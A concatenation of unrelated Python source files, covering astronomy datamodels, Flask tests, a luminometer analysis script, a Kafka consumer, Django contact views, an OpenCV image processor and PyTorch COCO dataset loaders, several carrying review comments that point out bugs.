        dataset_meta['stats'] = STATS['imagenet']
        print(f'Using imagenet stats for normalization')
    setattr(args, 'dataset_path', dataset_path)
    # L = number of labelled examples (used by SemCo internally).
    L = len(labelled_data)
    model = SemCo(args, dataset_meta, device, L)
    model.train(labelled_data=labelled_data, valid_data=valid_data, save_best_model=True)
# preds = model.predict() |
# Copyright (C) 2010 Association of Universities for Research in Astronomy(AURA)
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of AURA and its representatives may not be used to
# endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
from __future__ import absolute_import, division, print_function
__version__ = '1.1.0'
import numpy as np
from os.path import basename
from astropy.extern import six
from .model_base import DataModel
from .amilg import AmiLgModel
from .asn import AsnModel
from .combinedspec import CombinedSpecModel
from .container import ModelContainer
from .contrast import ContrastModel
from .cube import CubeModel
from .cubeflat import CubeFlatModel
from .dark import DarkModel
from .darkMIRI import DarkMIRIModel
from .drizpars import DrizParsModel, NircamDrizParsModel, MiriImgDrizParsModel
from .outlierpars import OutlierParsModel, NircamOutlierParsModel, MiriImgOutlierParsModel
from .drizproduct import DrizProductModel
from .filter import FilterModel
from .flat import FlatModel
from .fringe import FringeModel
from .gain import GainModel
from .gls_rampfit import GLS_RampFitModel
from .image import ImageModel
from .ipc import IPCModel
from .irs2 import IRS2Model
from .lastframe import LastFrameModel
from .linearity import LinearityModel
from .mask import MaskModel
from .miri_ramp import MIRIRampModel
from .multiexposure import MultiExposureModel
from .multislit import MultiSlitModel
from .multispec import MultiSpecModel
from .ifucube import IFUCubeModel
from .pixelarea import PixelAreaModel
from .photom import PhotomModel, FgsPhotomModel, NircamPhotomModel, NirissPhotomModel
from .photom import NirspecPhotomModel, NirspecFSPhotomModel
from .photom import MiriImgPhotomModel, MiriMrsPhotomModel
from .quad import QuadModel
from .ramp import RampModel
from .rampfitoutput import RampFitOutputModel
from .readnoise import ReadnoiseModel
from .reset import ResetModel
from .rscd import RSCDModel
from .saturation import SaturationModel
from .spec import SpecModel
from .straylight import StrayLightModel
from .superbias import SuperBiasModel
from .util import fits_header_name
# Public API for `from ... import *`. Kept in sync with the import block
# above; previously CombinedSpecModel, OutlierParsModel,
# NircamOutlierParsModel, MiriImgOutlierParsModel, PixelAreaModel and
# SuperBiasModel were imported but not exported.
__all__ = [
    'open',
    'DataModel', 'AmiLgModel', 'AsnModel', 'CombinedSpecModel', 'ContrastModel',
    'CubeModel', 'CubeFlatModel', 'DarkModel', 'DarkMIRIModel', 'DrizParsModel',
    'NircamDrizParsModel', 'MiriImgDrizParsModel',
    'OutlierParsModel', 'NircamOutlierParsModel', 'MiriImgOutlierParsModel',
    'DrizProductModel', 'FgsPhotomModel', 'FilterModel',
    'FlatModel', 'FringeModel', 'GainModel', 'GLS_RampFitModel',
    'ImageModel', 'IPCModel', 'IRS2Model', 'LastFrameModel', 'LinearityModel',
    'MaskModel', 'MIRIRampModel', 'ModelContainer',
    'MultiExposureModel',
    'MultiSlitModel',
    'MultiSpecModel', 'IFUCubeModel', 'PixelAreaModel', 'PhotomModel',
    'NircamPhotomModel',
    'NirissPhotomModel', 'NirspecPhotomModel', 'NirspecFSPhotomModel',
    'MiriImgPhotomModel', 'MiriMrsPhotomModel', 'QuadModel', 'RampModel',
    'RampFitOutputModel', 'ReadnoiseModel', 'ResetModel', 'RSCDModel',
    'SaturationModel', 'SpecModel', 'StrayLightModel', 'SuperBiasModel']
def open(init=None, extensions=None):
    """
    Creates a DataModel from a number of different types

    NOTE: intentionally shadows the builtin ``open``; callers use it as
    ``datamodels.open(...)``.

    Parameters
    ----------
    init : shape tuple, file path, file object, astropy.io.fits.HDUList, numpy array, dict, None

        - None: A default data model with no shape

        - shape tuple: Initialize with empty data of the given shape

        - file path: Initialize from the given file (FITS , JSON or ASDF)

        - readable file object: Initialize from the given file object

        - astropy.io.fits.HDUList: Initialize from the given
          `~astropy.io.fits.HDUList`

        - A numpy array: A new model with the data array initialized
          to what was passed in.

        - dict: The object model tree for the data model

    extensions : list of AsdfExtension
        A list of extensions to the ASDF to support when reading
        and writing ASDF files.

    Returns
    -------
    model : DataModel instance
    """
    from astropy.io import fits

    if init is None:
        return DataModel(None)

    # Send _asn.json files to ModelContainer; avoid shape "cleverness" below
    elif (isinstance(init, six.string_types) and
            basename(init).split('.')[0].split('_')[-1] == 'asn'):
        try:
            m = ModelContainer(init, extensions=extensions)
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # are no longer swallowed.
            raise TypeError(
                "init ASN not valid for ModelContainer"
            )
        return m

    elif isinstance(init, DataModel):
        # Copy the object so it knows not to close here
        return init.__class__(init)

    elif isinstance(init, tuple):
        for item in init:
            if not isinstance(item, int):
                raise ValueError("shape must be a tuple of ints")
        shape = init

    elif isinstance(init, np.ndarray):
        shape = init.shape

    else:
        # Anything path-like or readable is treated as a FITS source.
        if isinstance(init, (six.text_type, bytes)) or hasattr(init, "read"):
            hdulist = fits.open(init)
        elif isinstance(init, fits.HDUList):
            hdulist = init
        else:
            raise TypeError(
                "init must be None, shape tuple, file path, "
                "readable file object, or astropy.io.fits.HDUList")

        # Derive the data shape from the first SCI extension, if any.
        shape = ()
        try:
            hdu = hdulist[(fits_header_name('SCI'), 1)]
        except KeyError:
            pass
        else:
            if hasattr(hdu, 'shape'):
                shape = hdu.shape

    # Here, we try to be clever about which type to
    # return, otherwise, just return a new instance of the
    # requested class
    if len(shape) == 0:
        new_class = DataModel
    elif len(shape) == 4:
        # It's a RampModel, MIRIRampModel, or QuadModel
        try:
            dqhdu = hdulist[fits_header_name('DQ')]
        except KeyError:
            # It's a RampModel or MIRIRampModel
            try:
                refouthdu = hdulist[fits_header_name('REFOUT')]
            except KeyError:
                # It's a RampModel
                from . import ramp
                new_class = ramp.RampModel
            else:
                # It's a MIRIRampModel
                from . import miri_ramp
                new_class = miri_ramp.MIRIRampModel
        else:
            # It's a QuadModel
            from . import quad
            new_class = quad.QuadModel
    elif len(shape) == 3:
        # It's a CubeModel
        from . import cube
        new_class = cube.CubeModel
    elif len(shape) == 2:
        # A second SCI extension means multiple slits.
        try:
            hdu = hdulist[(fits_header_name('SCI'), 2)]
        except (KeyError, NameError):
            # It's an ImageModel
            from . import image
            new_class = image.ImageModel
        else:
            # It's a MultiSlitModel
            from . import multislit
            new_class = multislit.MultiSlitModel
    else:
        raise ValueError("Don't have a DataModel class to match the shape")

    return new_class(init, extensions=extensions)
# NOTE(review): disabled nose-based test harness kept as a module-level string
# literal (a no-op at import time). nose is unmaintained; consider deleting
# this or porting it to pytest.
'''
def test(verbose=False) :
    import nose

    # get the pandokia plugin if it is available (it will only
    # do anything if we are run from pandokia).
    try :
        import pandokia.helpers.nose_plugin as nose_plugin
    except ImportError :
        nose_plugin = None

    if nose_plugin :
        addplugins = [nose_plugin.Pdk()]
    else :
        addplugins = None

    # get the name of the test package
    argv = ['nosetests', '--exe', __name__ + '.tests']

    import jwst.datamodels.tests
    print ("ARGS", argv)

    # run nose
    return nose.main(argv = argv, addplugins=addplugins)
'''
|
import unittest
import webJoker
class TestCase(unittest.TestCase):
    """Smoke tests for the webJoker Flask app via its test client."""

    def setUp(self):
        webJoker.app.config["TESTING"] = True
        self.app = webJoker.app.test_client()

    # Tests if the remote url is responsive
    def test_response_webJoker(self):
        response = self.app.get('/')
        self.assertEqual(response.status_code, 200)

    # Tests if the joke has been retrieved successfully
    def test_type_webJoker(self):
        page = self.app.get("/test/type")
        # Bare `assert` is stripped under `python -O`; use unittest asserts.
        self.assertIn('success', str(page.data))

    # Tests if the retrieved joke is valid and indexed (comes with a designated ID)
    def test_id_webJoker(self):
        page = self.app.get("/test/id")
        # int() raises ValueError for non-numeric bodies; zero/empty fails.
        self.assertTrue(int(page.data))


if __name__ == '__main__':
    unittest.main()
|
import tables
import pandas as pd
import numpy as np
import csv
from scipy import stats
# Bunches with intensity below 6e9 are treated as empty/stray.
def removestrays(a):
    """Return a boolean mask: True where intensity >= 6e9 (a real bunch).

    Vectorized replacement for the original per-element list comprehension;
    identical output for 1-D numeric input.
    """
    return np.asarray(a) >= 6e9
# NOTE(review): the original indentation was lost in review; the hd5-reading
# loops are assumed to sit INSIDE the `with` block (the file is closed on
# exit, so touching hd5.root afterwards would fail) -- confirm against VCS.
with tables.open_file('/brildata/vdmdata17/6016_1707280758_1707280928.hd5') as hd5:
    # Take the bunch fill pattern from the first beam row only.
    for r in hd5.root.beam:
        bunchlist1 = removestrays(r['bxintensity1'])
        bunchlist2 = removestrays(r['bxintensity2'])
        # Filled in exactly one beam (XOR): non-colliding bunches.
        fillednoncolliding = (bunchlist1 | bunchlist2) & ~(bunchlist1 & bunchlist2)
        break
    # Bunches filled only in beam 1 / only in beam 2.
    b1 = bunchlist1 & ~bunchlist2
    b2 = bunchlist2 & ~bunchlist1
    bim1df = []
    bim2df = []
    # One dict per luminometer row: bunch-crossing index -> raw value.
    for row in hd5.root.bcm1fpcvdlumi:
        bim1 = {}
        bim2 = {}
        for i, bx in enumerate(b1):
            if not bx: continue
            bim1[i]=row['bxraw'][i]
        for i, bx in enumerate(b2):
            if not bx: continue
            bim2[i]=row['bxraw'][i]
        bim1df.append(bim1)
        bim2df.append(bim2)
    # bim.append(row['bxraw'][fillednoncolliding])
    # for r in bim:
    #     for i, bx in enumerate(b1):
    #         if not bx: continue
    #         bim1[i]=r[i]
    #     for i, bx in enumerate(b2):
    #         if not bx: continue
    #         bim2[i]=r[i]
# Time series per bunch: rows = readings, columns = bunch-crossing indices.
bim1df = pd.DataFrame(bim1df)
bim2df = pd.DataFrame(bim2df)
bim1df.to_csv('bcm1fmib1.csv')
bim2df.to_csv('bcm1fmib2.csv')
# NOTE(review): `av` is an unused leftover of the commented-out code below.
av = {}
with open('mibBcmAv.csv','w') as f:
    wr = csv.writer(f)
    wr.writerow(['bx1','bim1', 'bim1Std', 'bim1Sem', 'bx2', 'bim2', 'bim2Std', 'bim2Sem'])
    # NOTE(review): zip pairs beam-1 and beam-2 columns positionally;
    # presumably just a compact table layout, not a physical pairing --
    # verify with the author.
    for bx1,bx2 in zip(bim1df,bim2df):
        wr.writerow([bx1, np.mean(bim1df[bx1]), np.std(bim1df[bx1]), stats.sem(bim1df[bx1]),
                     bx2, np.mean(bim2df[bx2]), np.std(bim2df[bx2]), stats.sem(bim2df[bx2])])
# for bx in bim1df:
#     print bx
#     av[bx] = {}
#     av[bx]['bim1'] = np.mean(bim1df[bx])
#     av[bx]['bim1Std'] = np.std(bim1df[bx])
#     av[bx]['bim2'] = np.mean(bim2df[bx])
#     av[bx]['bim2Std'] = np.std(bim2df[bx])
# pd.DataFrame.from_dict(av).to_csv('bimbav.csv')
|
import io
from confluent_kafka import Consumer, KafkaError
from avro.io import DatumReader, BinaryDecoder
import avro.schema
# Parse the Avro schema once and share a single reader for all messages.
schema = avro.schema.parse(open("schema/PageViews.avsc", "rb").read())
reader = DatumReader(schema)
# Kafka topic to consume from.
topic = 'electric'
def decode(msg_value):
    """Deserialize a raw Avro-encoded message payload into a Python dict.

    Uses the module-level `reader` built from the PageViews schema; the
    payload is assumed to be schemaless Avro (no container header) --
    TODO confirm the producer's wire format.
    """
    message_bytes = io.BytesIO(msg_value)
    decoder = BinaryDecoder(message_bytes)
    event_dict = reader.read(decoder)
    return event_dict
# NOTE(review): confluent_kafka.Consumer normally requires a config dict
# (bootstrap.servers, group.id, ...); kept as-is pending the intended
# settings -- TODO confirm.
c = Consumer()
# subscribe() expects a LIST of topic names, not a bare string.
c.subscribe([topic])
running = True
try:
    while running:
        msg = c.poll()
        if not msg.error():
            msg_value = msg.value()
            event_dict = decode(msg_value)
            print(event_dict)
        elif msg.error().code() != KafkaError._PARTITION_EOF:
            print(msg.error())
            running = False
finally:
    # Commit final offsets and leave the consumer group cleanly.
    c.close()
# https://www.tensorflow.org/guide/saved_model
# Export a pretrained MobileNetV2 in SavedModel format; the "1" directory is
# the model version expected by TF Serving.
import tensorflow as tf

pretrained_model = tf.keras.applications.MobileNetV2()
tf.saved_model.save(pretrained_model, "mobilenet_v2/1/")
|
import logging
from django.shortcuts import render
from django.core.urlresolvers import reverse
from django.core.mail import EmailMessage, send_mail
from django.http import HttpResponseRedirect
from django.utils import timezone
from django.contrib import messages
from .forms import ContactForm
# Module-level logger named after this module.
logger = logging.getLogger(__name__)
def send_contact_form_mail(form):
    """Build and send the contact-form e-mail to the Techvet inboxes.

    Raises whatever EmailMessage.send() raises on failure; the caller is
    responsible for handling errors.
    """
    cleaned_data = form.cleaned_data
    subject = "Contato Techvet"
    from_email = "comercial@techvet.com.br"
    # Replies go to the visitor's address (previously assigned but unused).
    reply_to = cleaned_data["email"]
    now = timezone.localtime(timezone.now())
    day_now, hour_now = now.strftime("%D %H:%M:%S").split()
    body = "Enviado em " + day_now + " às " + hour_now + "\n"
    body += "\nNome: " + cleaned_data["name"]
    body += "\nE-mail: " + cleaned_data["email"]
    body += "\nTelefone: " + cleaned_data["phone"]
    body += "\nBairro: " + cleaned_data["neighborhood"]
    body += "\nServiços: " + ", ".join(cleaned_data["services"])
    body += "\nGostaria de Receber Novidades por E-mail? "
    body += cleaned_data["sign_newsletter"]
    body += "\nComo nos conheceu? " + cleaned_data["contact_source"]
    body += "\nMensagem: " + cleaned_data["message"]
    email = EmailMessage(subject, body, from_email,
                         ['comercial@techvet.com.br',
                          'sac@techvet.com.br'],
                         reply_to=[reply_to])
    email.send()
def index(request):
    """Render the public landing page."""
    return render(request, 'public/index.html')


def sobre(request):
    """Render the "about us" page."""
    return render(request, 'public/sobre.html')


def dedetizacao(request):
    """Render the pest-control service page."""
    return render(request, 'public/dedetizacao.html')


def cisterna(request):
    """Render the cistern-cleaning service page."""
    return render(request, 'public/cisterna.html')
def contato(request):
    """Contact page: validate the form, e-mail it, redirect to the thanks page.

    On send failure the user is redirected back with an error message.
    """
    form = ContactForm(request.POST or None)
    if form.is_valid():
        try:
            send_contact_form_mail(form)
        except Exception as e:
            form_error = "Ocorreu algum problema ao tentar enviar sua mensagem."\
                         " Tente novamente ou ligue para nós."\
                         " Obrigado pela compreensão!"
            messages.add_message(request, messages.ERROR, form_error)
            logger.error("Mail could not be sent: %s" % e)
            return HttpResponseRedirect(reverse('public:contato'))
        # Set the flag only AFTER the mail went out: previously it was set
        # before the send attempt, so a failed send still unlocked the
        # thank-you page.
        request.session['valid_contact_form'] = True
        return HttpResponseRedirect(reverse('public:contato_obrigado'))
    return render(request, 'public/contato.html', {'form': form})
def contato_obrigado(request):
    """Render the thank-you page once per successful contact submission."""
    # The flag is consumed on read, so a refresh cannot re-display the page.
    if request.session.pop('valid_contact_form', False):
        return render(request, 'public/contato_obrigado.html')
    return HttpResponseRedirect('/contato/')
|
# String Slicing practice script.
a = "Python"
# NOTE(review): the next line is a bare tuple expression -- it evaluates to
# (0, 1, 2, 3, 4) and is discarded. Presumably index notes; safe to delete.
0,1,2,3,4,
#print(a)
#print(a[0:-2])
b = "igffiWLIUWELIFBKUELFIBKEeUshvwKEJVDLKWFIUW"
#print(b[0:-3])
#print(len(b))
#print(len(a))
#name = input("Enter your name \t")
#print(name.upper())
#print(name.lower())
#print(len(name))
#name1 = "Python Language"
#print(name1)
#name1 = name1.replace("Python", "Ruby")
#print(name1.replace("Python", "Ruby"))
#print(name1)
# Read the user's full name and split it into a list of words on spaces.
username = input("Enter Full Name \t")
username = username.split(" ")
print(username)
|
import cv2
import config
import os
import numpy as np
from pathlib import Path
from flask import abort
# Processor class: parses resize/quality parameters encoded in the requested
# file name (e.g. "id-123_resize-cover_width-200_height-200.jpg"), finds the
# original image and produces a processed version, either streamed or saved.
class ImageProcessor:
    STORE_DIR = config.STORE_DIR
    # Fill value used for freshly created canvases (white).
    DEFAULT_CANVAS_COLOR_VALUE = 255

    def __init__(self, path):
        # common props
        self.full_path = path
        parts = self.full_path.split('.')
        self.path = parts[0]
        self.parts = self.path.split('_')
        # Streaming properties (filled by process_without_save)
        self.buffer = None
        self.retval = None
        # The decoded image (cv2 ndarray)
        self.img = None
        # Path of the image to serve/save
        self._img_path = None
        # Image properties parsed from the file name:
        # id of the original image
        self._id = None
        # Target width
        self._width = None
        # Target height
        self._height = None
        # Number of channels
        self._channels = 3
        # Resize mode ('cover' or 'contain')
        self._resize = None
        # Quality used when saving
        self._quality = None
        # Extension used when saving
        self._extension = parts[1]
        # Save options (progressive JPEG for .jpg)
        self._save_options = self._extension == 'jpg' and [cv2.IMWRITE_JPEG_PROGRESSIVE, 2] or []
        # Pipeline of actions applied before encoding/saving
        self._actions = ['_normalize_content']

    # Main method, WITHOUT saving to disk: encodes the result into a buffer.
    def process_without_save(self):
        # Parse the parameters and assign the actions to apply.
        self._parse()
        self._assign_actions()
        # Look up the original image by name.
        # Convention: originals are stored as "%id%.%extension%".
        img_path = self._get_original_img_path()
        # If the original is not found, respond with 404.
        if not img_path:
            abort(404)
        # If no actions are required, serve the original.
        if not self._actions:
            self._img_path = img_path
            return
        self._check_extension(img_path)
        try:
            self.img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
            # http://jira.opentech.local/browse/SHOP-919
            # Grayscale images come with a single channel, which does not
            # appear in the shape tuple on read. In that case assume 1 channel.
            shape = self.img.shape
            self._channels = (len(shape) > 2) and shape[-1] or 1
        except:
            # NOTE(review): bare except also hides programming errors; it
            # presumably guards against unreadable files -- consider
            # narrowing to AttributeError/cv2.error.
            abort(404)
        for action in self._actions:
            getattr(self, action, None)()
        retval, buffer = cv2.imencode('.' + self._extension, self.img)
        self.retval = retval
        self.buffer = buffer

    # Main method WITH saving to disk.
    def process_with_save(self):
        # If the file already exists, nothing to do.
        abs_path = self.STORE_DIR + self.full_path
        self._img_path = abs_path
        if Path(abs_path).is_file():
            return
        # Parse the parameters and assign the actions to apply.
        self._parse()
        self._assign_actions()
        # Look up the original image by name.
        # Convention: originals are stored as "%id%.%extension%".
        img_path = self._get_original_img_path()
        if not img_path:
            abort(404)
        # No actions required: serve the original.
        if not self._actions:
            self._img_path = img_path
            return
        self._check_extension(img_path)
        try:
            self.img = cv2.imread(img_path)
        except:
            # NOTE(review): same bare-except concern as above.
            abort(404)
        for action in self._actions:
            getattr(self, action, None)()
        cv2.imwrite(abs_path, self.img, self._save_options)

    # Full path of the produced image.
    def get_full_path(self):
        return self._img_path

    # Mimetype of the produced image.
    def get_mimetype(self):
        return 'image/' + self._extension

    # Do not convert png to jpg because of transparency issues.
    def _check_extension(self, img_path):
        if img_path.endswith('.png'):
            self._extension = 'png'

    # Locate the original image, trying each allowed extension in turn.
    def _get_original_img_path(self):
        img_path = None
        for ext in config.ORIGINAL_EXTENSIONS:
            path = os.path.join(self.STORE_DIR, "{0}.{1}".format(self._id, ext))
            if not Path(path).is_file():
                continue
            img_path = path
        return img_path

    # Parse the path and record the requested parameters.
    def _parse(self):
        for part in self.parts:
            for param_name in ['id', 'resize', 'width', 'height', 'quality']:
                self._parse_param(part, param_name)

    # Assign the actions implied by the parsed parameters.
    def _assign_actions(self):
        if self._resize:
            self._actions.append('_' + self._resize)
        if self._quality:
            self._actions.append('_change_quality')

    # Validate a numeric parameter against configured limits.
    def _validate_digit_param(self, name, value):
        limit = config.FIELDS_LIMITS.get(name, None)
        if not limit:
            return
        if value > limit:
            abort(400)

    # Parse a single "key-value" segment of the file name.
    def _parse_param(self, part, param_name):
        # Already set from an earlier segment: keep the first value.
        if getattr(self, '_' + param_name):
            return
        part_values = part.split('-')
        if len(part_values) < 2:
            abort(400)
        key, value = part_values
        if key != param_name:
            return
        if value.isdigit():
            value = int(value)
            self._validate_digit_param(key, value)
        setattr(self, '_' + param_name, value)

    # Compute target sizes for the 'cover' resize mode.
    def _get_sizes_cover(self):
        original_height, original_width = self.img.shape[:2]
        aspect_ratio = original_height / original_width
        # Keep the original proportions.
        if aspect_ratio > 1:
            width = self._width
            height = int(width * aspect_ratio)
        elif aspect_ratio == 1.0:
            width = self._width
            height = width
        else:
            height = self._height
            width = int(height / aspect_ratio)
        return width, height

    # Compute target sizes for the 'contain' resize mode.
    def _get_sizes_contain(self):
        original_height, original_width = self.img.shape[:2]
        aspect_ratio = original_height / original_width
        # Keep the original proportions.
        if aspect_ratio > 1:
            height = self._height
            width = int(height / aspect_ratio)
        elif aspect_ratio == 1.0:
            width = self._width
            height = width
        else:
            width = self._width
            height = int(width * aspect_ratio)
        return width, height

    # Create a background canvas of the target size.
    def _create_canvas(self, height=None, width=None):
        new_height = height or self._height
        new_width = width or self._width
        canvas = np.ndarray(shape=(new_height, new_width, self._channels), dtype=self.img.dtype)
        canvas_color_value = self.DEFAULT_CANVAS_COLOR_VALUE
        # If an alpha channel is present, match the alpha of the first pixel.
        if self._extension == 'png' and self._channels == 4:
            canvas_color_value = self.img.item(0, 0, -1)
        canvas[:] = tuple([canvas_color_value] * self._channels)
        return canvas

    # Re-check self.img.shape: cv2 rebuilds the shape after each action and
    # may drop the channel axis for single-channel images.
    def _check_img_shape(self):
        if len(self.img.shape) == 2:
            self.img.shape += (1, )

    # Resize the image according to the requested mode.
    def _make_resize(self):
        if not self._resize or self._resize not in ['cover', 'contain']:
            return
        width, height = getattr(self, '_get_sizes_' + self._resize)()
        self.img = cv2.resize(
            self.img,
            (
                width,
                height
            ),
            interpolation=cv2.INTER_LINEAR
        )

    # Resize contain: fit onto the canvas, centering along the short side.
    def _contain(self):
        self._make_resize()
        self._check_img_shape()
        canvas = self._create_canvas()
        height, width = self.img.shape[:2]
        if height > width:
            offset = abs(int((self._width - width) / 2))
            canvas[0:height, offset:offset + width, :self._channels] = self.img
        elif height < width:
            offset = abs(int((self._height - height) / 2))
            canvas[offset:offset + height, 0:width, :self._channels] = self.img
        else:
            canvas[:height, :width, :self._channels] = self.img
        self.img = canvas

    # Resize cover: crop the long side to the target, centered.
    def _cover(self):
        self._make_resize()
        self._check_img_shape()
        canvas = self._create_canvas()
        height, width = self.img.shape[:2]
        if height > width:
            offset = abs(int((height - self._height) / 2))
            canvas = self.img[offset:offset + self._height, 0:width]
        elif height < width:
            offset = abs(int((width - self._width) / 2))
            canvas = self.img[0:height, offset:offset + self._width]
        else:
            canvas[:height, :width, :self._channels] = self.img
        self.img = canvas

    # Adjust the encoder quality options.
    def _change_quality(self):
        if self._extension == 'jpg':
            self._save_options += [cv2.IMWRITE_JPEG_QUALITY, self._quality]
        elif self._extension == 'webp':
            self._save_options += [int(cv2.IMWRITE_WEBP_QUALITY), self._quality]
        elif self._extension == 'png':
            pass
        # Reject any other extension.
        else:
            abort(400)

    # Content normalization: trim the white margins around the content and
    # re-center it on a canvas with uniform padding.
    def _normalize_content(self):
        self._check_img_shape()
        # Coordinates of all non-white pixels (content bounding box).
        (y, x, _) = np.where(self.img != tuple([255] * self._channels))
        (top_y, top_x) = (np.min(y), np.min(x))
        (bottom_y, bottom_x) = (np.max(y), np.max(x))
        self.img = self.img[top_y:bottom_y, top_x:bottom_x]
        height, width = self.img.shape[:2]
        # png keeps no padding (transparency); other formats pad per config.
        canvas_px = 0 if self._extension == 'png' else config.NORMALIZE_CANVAS_PX
        fields_px = 0 if self._extension == 'png' else config.NORMALIZE_FIELDS_PX
        if height < width:
            canvas = self._create_canvas(height, width + canvas_px)
            canvas[:height, fields_px:width + fields_px, :self._channels] = self.img
        elif height > width:
            canvas = self._create_canvas(height + canvas_px, width)
            canvas[fields_px:height + fields_px, :width, :self._channels] = self.img
        else:
            canvas = self._create_canvas(height + canvas_px, width + canvas_px)
            canvas[fields_px:height + fields_px, fields_px:width + fields_px, :self._channels] = self.img
        self.img = canvas
|
from torchvision import datasets, transforms
from torchvision.datasets.vision import VisionDataset
from base import BaseDataLoader
import os
from PIL import Image
from .utils import coco_utils
class WaterMeterDataset(object):
    """Detection dataset for water-meter images in COCO-style layout.

    NOTE(review): __getitem__ is broken as written and appears to be a
    partial copy of torchvision's COCO conversion code:
      * `target` is read (image_id/annotations) before being assigned;
      * `self.masks` is never defined (only `self.imgs` is);
      * `torch` and `convert_coco_poly_to_mask` are not imported at module
        level in this file.
    Documented as-is; needs a functional fix before use.
    """

    def __init__(self, root, transforms):
        self.root = root
        self.transforms = transforms
        # load all image files, sorting them to
        # ensure that they are aligned
        self.imgs = list(sorted(os.listdir(os.path.join(root, "PNGImages"))))

    def __getitem__(self, idx):
        # load images ad masks
        img_path = os.path.join(self.root, "images/train2017", self.imgs[idx])
        # NOTE(review): self.masks is never set anywhere in this class.
        target_path = os.path.join(self.root, "annotations/", self.masks[idx])
        img = Image.open(img_path).convert("RGB")
        w, h = img.size
        # NOTE(review): `target` is used here before it is assigned below.
        image_id = target["image_id"]
        image_id = torch.tensor([image_id])
        anno = target["annotations"]
        # Drop crowd annotations.
        anno = [obj for obj in anno if obj['iscrowd'] == 0]
        boxes = [obj["bbox"] for obj in anno]
        # guard against no boxes via resizing
        boxes = torch.as_tensor(boxes, dtype=torch.float32).reshape(-1, 4)
        # Convert [x, y, w, h] to [x0, y0, x1, y1] and clamp to the image.
        boxes[:, 2:] += boxes[:, :2]
        boxes[:, 0::2].clamp_(min=0, max=w)
        boxes[:, 1::2].clamp_(min=0, max=h)
        classes = [obj["category_id"] for obj in anno]
        classes = torch.tensor(classes, dtype=torch.int64)
        segmentations = [obj["segmentation"] for obj in anno]
        # NOTE(review): convert_coco_poly_to_mask is not imported here.
        masks = convert_coco_poly_to_mask(segmentations, h, w)
        keypoints = None
        if anno and "keypoints" in anno[0]:
            keypoints = [obj["keypoints"] for obj in anno]
            keypoints = torch.as_tensor(keypoints, dtype=torch.float32)
            num_keypoints = keypoints.shape[0]
            if num_keypoints:
                keypoints = keypoints.view(num_keypoints, -1, 3)
        # Keep only boxes with positive width and height.
        keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
        boxes = boxes[keep]
        classes = classes[keep]
        masks = masks[keep]
        if keypoints is not None:
            keypoints = keypoints[keep]
        target = {}
        target["boxes"] = boxes
        target["labels"] = classes
        target["masks"] = masks
        target["image_id"] = image_id
        if keypoints is not None:
            target["keypoints"] = keypoints
        # for conversion to coco api
        area = torch.tensor([obj["area"] for obj in anno])
        iscrowd = torch.tensor([obj["iscrowd"] for obj in anno])
        target["area"] = area
        target["iscrowd"] = iscrowd
        if self.transforms is not None:
            img, target = self.transforms(img, target)
        return img, target

    def __len__(self):
        return len(self.imgs)
class CocoDataset(VisionDataset):
    """`MS Coco Detection <http://mscoco.org/dataset/#detections-challenge2016>`_ Dataset.

    Args:
        root (string): Root directory where images are downloaded to.
        annFile (string): Path to json annotation file.
        transform (callable, optional): A function/transform that  takes in an PIL image
            and returns a transformed version. E.g, ``transforms.ToTensor``
        target_transform (callable, optional): A function/transform that takes in the
            target and transforms it.
        transforms (callable, optional): A function/transform that takes input sample and its target as entry
            and returns a transformed version.
    """

    def __init__(self, root, annFile, train=True, transforms=None):
        super(CocoDataset, self).__init__(root, transforms)
        from pycocotools.coco import COCO
        # Load the train or validation annotation file.
        if train:
            self.coco = COCO(annFile+'train2017.json')
        else:
            self.coco = COCO(annFile+'val2017.json')
        self.ids = list(sorted(self.coco.imgs.keys()))

    def __getitem__(self, index):
        """
        Args:
            index (int): Index

        Returns:
            tuple: Tuple (image, target). target is the object returned by ``coco.loadAnns``.
        """
        coco = self.coco
        img_id = self.ids[index]
        ann_ids = coco.getAnnIds(imgIds=img_id)
        target = coco.loadAnns(ann_ids)
        path = coco.loadImgs(img_id)[0]['file_name']
        img = Image.open(os.path.join(self.root, path)).convert('RGB')
        # Convert polygon annotations to masks.
        t = [coco_utils.ConvertCOCOPolyToMask()]
        # NOTE(review): this branch looks broken:
        #   * `self.transform` (singular) is set to None by VisionDataset --
        #     the transforms passed to __init__ land in `self.transforms`,
        #     so this guard is always False and the pipeline never runs;
        #   * `self.transforms.append(t)` would append a LIST to a Compose,
        #     which has no `append` method.
        # Presumably the intent was to apply ConvertCOCOPolyToMask and then
        # self.transforms -- confirm and fix before use.
        if self.transform is not None:
            self.transforms.append(t)
            img, target = self.transform(img, target)
        return img, target

    def __len__(self):
        return len(self.ids)
class CocoDataLoader(BaseDataLoader):
    """COCO detection data loading built on BaseDataLoader."""

    def __init__(self, data_dir, annFile, batch_size, shuffle=True, validation_split=0.0, num_workers=1, training=True):
        self.data_dir = data_dir
        self.annFile = annFile
        # Images are converted to tensors; further augmentation can be
        # appended to this pipeline.
        pipeline = transforms.Compose([
            transforms.ToTensor()
        ])
        self.dataset = CocoDataset(self.data_dir, self.annFile, train=training, transforms=pipeline)
